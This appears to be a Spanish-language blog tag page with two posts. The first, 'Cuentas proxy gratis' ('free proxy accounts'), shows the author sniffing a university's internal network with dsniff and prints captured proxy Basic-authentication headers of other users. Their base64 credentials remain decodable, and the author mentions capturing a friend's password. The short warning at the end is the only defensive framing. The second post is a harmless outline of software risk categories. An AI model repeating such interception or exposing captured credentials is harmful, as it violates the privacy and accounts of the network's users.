Mostrando entradas con la etiqueta riesgos. Mostrar todas las entradas
Mostrando entradas con la etiqueta riesgos. Mostrar todas las entradas

miércoles, 1 de abril de 2009

Cuentas proxy gratis

Con un simple comando he podido obtener algunas claves para autenticación con el proxy de la red interna de la utpl, es muy sencillo
root: dsniff -d -i eth0

dsniff: trigger_tcp: decoding port 3128 as http
-----------------
04/01/09 05:19:53 tcp 172.16.25.154.22994 -> gdr4.utpl.edu.ec.3128 (http)
GET http://www.hlatorre.com/images/back_izq8.gif HTTP/1.1
Host: www.hlatorre.com
Proxy-Authorization: Basic aGZnb21lejo5OTQ4Mw== [h¶g¹mºz:¼Á4À3]

dsniff: trigger_tcp: decoding port 3128 as http
-----------------
04/01/09 05:19:58 tcp 172.16.25.159.42177 -> gdr4.utpl.edu.ec.3128 (http)
CONNECT certs.opera.com:443 HTTP/1.0
Host: certs.opera.com:443
Proxy-Authorization: Basic anBhbmdhbWFyY2E6cXVlY2h1Y2hhdG
VpbXBvcnRh
[°p±nµa¸aºc¼:qu§c¦u¥h®t°iµµp¶rtº]

Es algo tan sencillo no? cualquiera puede utilizar este tipo de herramientas, es muy sencillo encontrarlas e instalarlas, pero, por tal razón hay que tomar medidas, puesto que cualquiera puede ponerse a escuchar las contraseñas en una inalambrica y sacar las claves, como se muestran aqui.
Además e puesto caracteres especiales en los usuarios y contraseñas, la presenta es solo una muestra, un amigo se atravesó con su clave y pues lamentablemente no pude hacer nada dsniff la sacó.


Publicado por en No hay comentarios:
Etiquetas: , , , , , ,

jueves, 12 de junio de 2008

Análisis de riegos


El análisis consiste en efectuar una revisión sobre los diferentes peligros que pueden afectar al desarrollo del proyecto como al producto final esperado.
Atacar los riesgos
Es necesario que se realice un análisis por riesgo, es decir tener conocimiento de las consecuencias que puede tener un riesgo sobre el proceso o el producto, es obviamente crucial poner énfasis sobre aquellos defectos que representan o pueden representar a futuro un problema peor.
Es decir, es más factible atacar al problema cuando este recién está apareciendo o cuando aún es una amenaza que hacerlo cuando este ya ha comenzado a causar estragos en el proceso.
Riesgos de poco efecto
He denominado de esa manera aquellos que cuando son detectados y evaluados no representan un problema grave, ni siquiera medio, por que al hacer la evaluación se llega a la conclusión de que a futuro no tendrá ninguna acción anormal sobre el sistema.
Ahora, ¿Cómo categorizar los riesgos?
Se han categorizado de muchas formas a los riesgos e aquí algunas formas:
• Riesgo nulo o cero
• Riesgo igual a uno
• Riesgo como caja negra
• Riesgo como probabilidad
O también:
• Riesgo esperable
• Riesgo estadístico o actual
• Riesgo predictivo
• Riesgo percibido, etc.
Y es válido confirmar y reafirmar que las categorías mencionadas NO son las utilizadas obligatoriamente, puesto que la categorización de los riesgos depende mucho del proyecto que se va a desarrollar, de las áreas comunes afectadas por los riesgos, y de la decisión del equipo de aseguramiento.
Publicado por en No hay comentarios:
Etiquetas: , , ,
Suscribirse a: Entradas (Atom)